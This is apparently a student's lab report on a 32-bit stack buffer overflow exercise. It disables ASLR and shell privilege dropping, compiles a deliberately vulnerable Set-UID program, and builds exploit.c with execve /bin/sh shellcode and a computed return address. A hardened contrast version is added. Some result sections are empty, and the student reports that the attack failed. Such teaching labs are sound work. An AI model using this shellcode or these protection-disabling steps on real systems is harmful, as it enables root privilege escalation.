20165333 Buffer Overflow Vulnerability Experiment
I. Experimental introduction
A buffer overflow is a situation in which a program writes past the end of a pre-allocated, fixed-length buffer. Malicious users can exploit this vulnerability to alter the control flow of a program, or even to execute arbitrary code fragments. The vulnerability arises because the data buffer and the saved return address lie close together on the stack, so data that overflows the buffer can overwrite the return address.
II. Preparation of the experiment
To make the assembly instructions easier to observe, we need to work in a 32-bit environment, so some preparation is needed before the experiment.
Enter the following commands to install the packages needed to compile a 32-bit C program:
$ sudo apt-get update
$ sudo apt-get install -y lib32z1 libc6-dev-i386
$ sudo apt-get install -y lib32readline-gplv2-dev
III. Experimental steps
3.1 Initial setup
1. Ubuntu and some other Linux systems use address space layout randomization (ASLR) to randomize the initial addresses of the heap and the stack. This makes it difficult to guess the correct memory address, and guessing the memory address is the key to a buffer overflow attack. So in this experiment we turn this feature off with the following command:
$ sudo sysctl -w kernel.randomize_va_space=0
2. In addition, to further protect against buffer overflow attacks and other attacks that make use of shell programs, many shells automatically drop their privileges when invoked. Therefore, even if you can trick a Set-UID program into invoking a shell, you cannot keep root privileges in that shell. /bin/bash implements this protection.
In a Linux system, /bin/sh is actually a symbolic link to /bin/bash or /bin/dash. To reproduce the situation before this protection existed, we use another shell program (zsh) instead of /bin/bash. The following commands set up zsh as sh:
$ sudo su
$ cd /bin
$ rm sh
$ ln -s zsh sh
$ exit
3. Enter the command linux32 to enter the 32-bit Linux environment.
3.2 Principle
In general, a buffer overflow causes a program to crash: inside the program, the overflowing data overwrites the return address. If the data that overwrites the return address is itself another address, the program jumps to that address, and if that address holds a carefully crafted piece of code that performs some other function, that code is called shellcode.
3.3 Vulnerable program
Create a new file stack.c in the /tmp directory:
$ cd /tmp
$ vi stack.c
Write the following code:
/* stack.c */
/* This program has a buffer overflow vulnerability. */
/* Our task is to exploit this vulnerability. */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int bof(char *str)
{
    char buffer[12];

    /* The following statement has a buffer overflow problem:
     * strcpy() copies until it reaches a NUL byte, regardless of
     * the 12-byte size of buffer. */
    strcpy(buffer, str);

    return 1;
}

int main(int argc, char **argv)
{
    char str[517];
    FILE *badfile;

    /* Read up to 517 bytes from badfile and hand them to bof(). */
    badfile = fopen("badfile", "r");
    fread(str, sizeof(char), 517, badfile);
    bof(str);

    printf("Returned Properly\n");
    return 1;
}
Compile the program and set the Set-UID bit. Notes on the compilation options:
Note: GCC has a stack protection mechanism that guards against buffer overflows, so we must pass -fno-stack-protector to disable it when compiling the code. The option -z execstack makes the stack executable.
The -g option allows the compiled executable to be debugged with GDB.
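For comparison with stack.c, this is an added example (not part of the lab or its code) showing how the same bof()/main() pair looks once the copy is bounded by the destination size and the number of bytes actually read: the 517-byte badfile that overwrites the return address in the lab is simply rejected. The names bof_safe and process_badfile are my own; compile it without -fno-stack-protector so the GCC canary stays on as a second layer.

```c
#include <stdio.h>
#include <string.h>

#define BUF_LEN  12    /* same 12-byte buffer as the lab's bof() */
#define FILE_LEN 517   /* same read size as the lab's main() */

/* Hardened replacement for bof(): the caller passes the number of bytes
 * actually read, the copy is bounded by the destination size, and input
 * that would not fit (NUL included) is rejected instead of spilling onto
 * the saved frame pointer and return address. Returns 1 if the input was
 * accepted and 0 if it was rejected (the lab's bof() always returns 1). */
int bof_safe(const char *str, size_t len)
{
    char buffer[BUF_LEN];

    if (len >= BUF_LEN)            /* at most BUF_LEN - 1 payload bytes */
        return 0;
    memcpy(buffer, str, len);      /* bounded copy, unlike strcpy() */
    buffer[len] = '\0';
    return 1;
}

/* Hardened counterpart of the lab's main(): fread() reports how many bytes
 * badfile really contained, and that count, not the 517-byte array size,
 * is all bof_safe() may copy. Returns bof_safe()'s result, or -1 if the
 * file cannot be opened (the lab's main() does not check fopen()). */
int process_badfile(const char *path)
{
    char str[FILE_LEN];
    size_t n;
    FILE *badfile = fopen(path, "r");

    if (badfile == NULL)
        return -1;
    n = fread(str, 1, sizeof str, badfile);
    fclose(badfile);
    return bof_safe(str, n);
}

int main(void)
{
    /* Constructed inputs: a short string, and a 517-byte block of 0x90
     * like the one exploit.c starts from before it adds its payload. */
    char sled[FILE_LEN];
    memset(sled, 0x90, sizeof sled);
    printf("5-byte input accepted:   %d\n", bof_safe("hello", 5));
    printf("517-byte input accepted: %d\n", bof_safe(sled, sizeof sled));
    return 0;
}
```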
3.4 Attack program
Our goal is to attack the vulnerable program just created and gain root privileges through the attack.
Create a new file exploit.c in the /tmp directory and enter the following:
/* exploit.c */
/* A program that creates a file containing code for launching a shell. */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

char shellcode[] =
    "\x31\xc0"      /* xorl  %eax,%eax    */
    "\x50"          /* pushl %eax         */
    "\x68""//sh"    /* pushl $0x68732f2f  */
    "\x68""/bin"    /* pushl $0x6e69622f  */
    "\x89\xe3"      /* movl  %esp,%ebx    */
    "\x50"          /* pushl %eax         */
    "\x53"          /* pushl %ebx         */
    "\x89\xe1"      /* movl  %esp,%ecx    */
    "\x99"          /* cdq                */
    "\xb0\x0b"      /* movb  $0x0b,%al    */
    "\xcd\x80";     /* int   $0x80        */

int main(int argc, char **argv)
{
    char buffer[517];
    FILE *badfile;

    /* Initialize buffer with 0x90 (NOP instruction) */
    memset(buffer, 0x90, 517);

    /* Need to fill the buffer with appropriate contents here:
     * the four \x?? bytes, at a specific offset in buffer, overwrite the
     * return address with the address of the shellcode; replace them
     * with the address computed below. */
    strcpy(buffer,
           "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
           "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
           "\x??\x??\x??\x??");

    /* Copy the shellcode into buffer at offset 100 */
    strcpy(buffer + 100, shellcode);

    /* Save the contents to the file "badfile" */
    badfile = fopen("./badfile", "w");
    fwrite(buffer, 517, 1, badfile);
    fclose(badfile);
    return 0;
}
Notice that in the code above, \x?? \x?? \x?? \x?? must be replaced with the address at which the shellcode is stored in memory, because those bytes land exactly where the return address is after the overflow occurs. The statement strcpy(buffer + 100, shellcode); also tells us that the shellcode is stored at offset 100 in buffer. Below we describe in detail how to obtain the address we need to fill in.
Now we obtain the in-memory address of the shellcode. Enter the commands:
$ gdb stack
$ disass main
Results
Continue the operation
Note: the attack using the str address obtained here was unsuccessful.
Obtain the str address and add 0x64 to it to compute the shellcode address: 0xff8d87a0 (hex) + 0x64 (100 in decimal) = 0xff8d8804 (hex).
Now modify the exploit.c file: change \x?? \x?? \x?? \x?? to \x04\x88\x8d\xff.
3.5 Attack results
If the attack does not succeed and a segmentation fault is reported, use the GDB disassembly again to recompute the memory address.
IV. Practice
1. Follow the experimental steps, attack the vulnerable program and gain root privileges.
2. Use the command sudo sysctl -w kernel.randomize_va_space=2 to turn the system's address space randomization back on, then run the exploit program against the stack program repeatedly and observe whether the attack succeeds and root privileges can be obtained.
3. Change /bin/sh back to /bin/bash (or /bin/dash) and observe whether the attack succeeds and root privileges can be obtained.
Results
The attack was unsuccessful.
Experimental thoughts
The experiment was carried out according to the steps provided by the lab platform, and I worked through the errors that arose from typing mistakes in the code. The precondition for the experiment to succeed is that the overflow protection mechanism is turned off; the attack does not succeed when the overflow protection mechanism is on.